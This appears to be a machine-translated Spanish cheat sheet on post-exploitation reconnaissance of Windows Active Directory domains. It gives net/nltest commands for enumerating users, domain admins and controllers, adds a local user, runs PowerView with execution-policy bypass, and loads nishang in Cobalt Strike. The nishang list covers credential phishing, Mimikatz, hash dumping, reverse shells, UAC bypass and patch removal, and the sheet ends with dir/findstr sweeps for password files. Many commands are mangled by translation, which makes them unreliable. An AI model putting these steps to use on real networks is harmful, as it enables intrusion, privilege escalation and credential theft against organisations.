Mi informacion de contacto
Correo[email protected]
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Cuatro situaciones:
1. Usuario local: usuario
2. Usuario administrador local: deshabilitado en la versión doméstica, solo disponible en el servidor
3. Usuarios dentro del dominio
4. Administrador de dominio
Los usuarios locales comunes no pueden obtener información de dominio
Los usuarios administradores locales pueden escalar directamente sus derechos a los usuarios del sistema (usuarios dentro del dominio) y obtener información dentro del dominio.
1. Determine si el dominio existe:
1. Verifique el dominio: ipconfig/all o systeminfo o net config workstation
ipconfig /all: Dominio encontrado: hack.com
systeminfo: El dominio encontrado es: hack.com
2. Vea el host DNS del dominio: nombre de dominio nslookup (hack.com)
3.Tiempo neto/dominio tres situaciones
El dominio existe, pero el usuario actual no es un usuario del dominio.
Existe un dominio y el usuario actual es un usuario del dominio.
El entorno de red actual es un grupo de trabajo y no existe ningún dominio.
1.vista de red: muestra la lista de dominios, la lista de computadoras, los recursos compartidos de la computadora especificada: vista de red (muestra la lista de computadoras) vista de red \ computadora (ver la computadora compartida especificada)
net view /dominio:nombre de dominio (truco) (mostrar lista de computadoras)
2.usuario de red para ver los usuarios locales: usuario de red/dominio para ver cuántos usuarios hay en el dominio
Agregar usuario: nombre de usuario neto (admin) contraseña (123)/agregar
Uso de 3.net: conecte la computadora o desconéctela del recurso compartido, muestre la información de conexión de la computadora
4.hora neta: use la hora para sincronizar computadoras o dominios: hora neta \ hora neta de la computadora / dominio
5.net start: inicia el servicio o muestra el servicio iniciado: net start service
6.net pausa: pausar el servicio en ejecución: servicio de pausa neta
7.net continuar: reactivar el servicio: servicio net continuar
8.net stop: Detener el servicio Windows NT/2000/2003: servicio net stop
9.net share: eliminar, crear o mostrar recursos compartidos
Sesión 10.net: Lista o desconecta las sesiones de la computadora local y los clientes conectados a ella:
net session //computadora (identifica la computadora que se listará o sesionará)
sesión de red // eliminar computadora (desconectar la sesión de la computadora especificada)
11.net localgroup Ver grupo de computadoras (solo aplicable a local): nombre de usuario de net localgroup
Usuario de dominio: nombre de usuario/dominio de net localgroup
El grupo 12.net consulta el nombre del grupo en el dominio (solo aplicable a controladores de dominio): grupo net/dominio
13.net config muestra los servicios configurables actualmente en ejecución, o muestra y cambia la configuración de un servicio (localmente):
net config (muestra los servicios en ejecución) net config Services (muestra una lista de servicios)
Computadora 14.net Agregar o eliminar computadoras de la base de datos del dominio:
net computer \computername /add o /del (agregar o eliminar computadoras al dominio de inicio de sesión)
Si aparece "La lista de servidores de este grupo de trabajo no está disponible actualmente", habilite los servicios: servidor, estación de trabajo, navegador de computadora y cierre el firewall.
Ver dominio: ipconfig/all o systeminfo o net config workstation
Ver el host DNS del dominio: nombre de dominio nslookup (hack.com)
Dominio de consulta: vista de red /dominio
Consulta todas las computadoras en el dominio: net view /dominio:nombre de dominio
Consulta la lista de todos los grupos de usuarios en el dominio: grupo neto/dominio
Consulte la lista de computadoras de todos los miembros del dominio: grupo de red "computadoras de dominio" /dominio
Consultar la información de la contraseña en el dominio: cuentas netas /dominio
Obtenga información de confianza del dominio: nltest /domain_trusts
Ver el nombre del controlador de dominio: nltest /DCLIST:hack
Ver el nombre de la máquina, buscar la IP, ping/nslookup: nombre del controlador de dominio ping/nslookup
A veces, el ping está deshabilitado. Utilice nslookup aquí.
Ver el nombre de host del controlador de dominio: nslookup ‐type=SRV _ldap._tcp
Consultar la hora actual: hora neta/dominio
Ver el grupo de controladores de dominio: grupo de red "Controladores de dominio" /dominio
1. Consultar información del usuario en el dominio: usuario de red /dominio
2. Ver usuarios locales: cuenta de usuario wmic obtiene nombre Usuarios de dominio: cuenta de usuario wmic obtiene dominio, nombre
Usuario local:
Usuario de dominio:
3. Verifique los usuarios existentes: usuario dsquery (a veces es posible que no se ejecute y solo se puede ejecutar en la máquina del servidor)
4. Consultar el grupo de usuarios administradores locales: administradores de net localgroup
5. Consultar a los usuarios administradores de dominio: grupo de red "administradores de dominio" /dominio
6. Consulte el grupo de usuarios del administrador del dominio: grupo de red "Administradores empresariales" /dominio
Aquí se necesitan dos herramientas
Primero cargue la herramienta en el servidor y luego ejecútela
1.PVEFindADUser: PVEFindADUser.exe -current (tenga en cuenta la ruta) Esta herramienta puede verificar qué usuarios han iniciado sesión en la computadora, permitiéndonos encontrar el administrador del dominio.
2.secuencia de comandos powerView:
powershell.exe -exec bypass -command "& { import-module .PowerView.ps1;Invoke-UserHunter}"
Primero verifique los permisos: Get-ExecutionPolicy
Cambie la política de ejecución: Set-ExecutionPolicy Unrestricted (solo los permisos sin restricciones pueden ejecutar pow)
Herramienta nishang (hay un enlace de descarga en el artículo anterior):
Después de colocarlo en el directorio CS, impórtelo directamente: powershell-import nishang/nishang.psm1
Ejecutar: comando powershell
Algunos comandos de uso común:
Check-VM: compruebe si el host es una máquina virtual
Invoke-CredentialsPhish: engaña al usuario para que ingrese su contraseña
Get-WLAN-Keys: información wifi
Invoke-Mimikatz: capturar contraseñas
Get-PassHashes: Obtener hash
Get-PassHints: obtiene la información de sugerencia de contraseña del usuario
Invoke-PowerShellTcp: Shell de rebote
Invocar-PsUACme: Omitir UAC
Quitar-Actualizar: Quitar el parche
Obtener información: información local
Ejemplo: powershell Check-VM
1. Recopile varios archivos confidenciales en directorios designados.
directorio /a /s /bd:"*.txt"
directorio /a /s /b C:"*.xlsx"
directorio /a /s /bd:"*.md"
directorio /a /s /bd:"*.sql"
directorio /a /s /bd:"*.pdf"
directorio /a /s /bd:"*.docx"
directorio /a /s /bd:"*.doc"
directorio /a /s /bd:"*conf*"
directorio /a /s /bd:"*bak*"
directorio /a /s /bd:"*contraseña*"
dir /a /s /bd:"*contraseña*"
dir /a /s /bd:"*iniciar sesión*"
dir /a /s /bd:"*usuario*"
2. Recopile varias contraseñas de cuentas de archivos en el directorio especificado.
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si contraseña de usuario *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si iniciar sesión *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si usuario *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Ejemplo: dir /a /s /bd:"*.txt"